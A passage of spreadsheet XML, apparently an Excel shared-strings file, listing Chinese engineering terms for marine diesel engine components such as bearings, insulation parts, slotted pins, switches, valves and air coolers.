      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>径向滚轮轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>径向滚针轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>净化器盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>静电过滤，总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>静态曲轴负荷</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>镜片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>镜片移出器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>矩形槽规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>矩形垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>矩形防护装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>矩形压缩弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>聚氯乙烯隔音板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>聚四氟乙烯涂层处理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卷筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝垫板盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝热和降噪</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘薄片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘材料</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘材料</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘带</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘粉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘固定板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘毛布</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘排气阀壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘手套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘线</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘增压空气总管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>均压器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卡规表格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卡盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽式自锁螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽销，带弹簧孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽销，内螺纹锥型</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽销，外螺纹锥型</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽销，圆筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽销，锥形槽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽销，锥型，平面式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽销，锥型，特制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开放式过滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开放式过滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关布置文本文档</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关恒压阀测试调整</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关温控阀测试调整</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口扳手</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口单向阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口管总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口梅花扳手</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开路监视装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>考克</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>科特导流管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可变距螺旋桨</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可变喷嘴环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可变增压器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>L</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形联轴器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>L</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调冲液式仪表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调节的弯管联结器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调节弯头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可选工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可移动绝缘盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可移式燃油支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刻度尺</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刻度和超速布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器布置，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-67,80,90</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器插芯手滑车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器淡水出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器的质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器低温水进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器底座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器吊梁</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器吊梁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器吊装</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器放泄漏斗支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器附件起吊</t>
    </r>
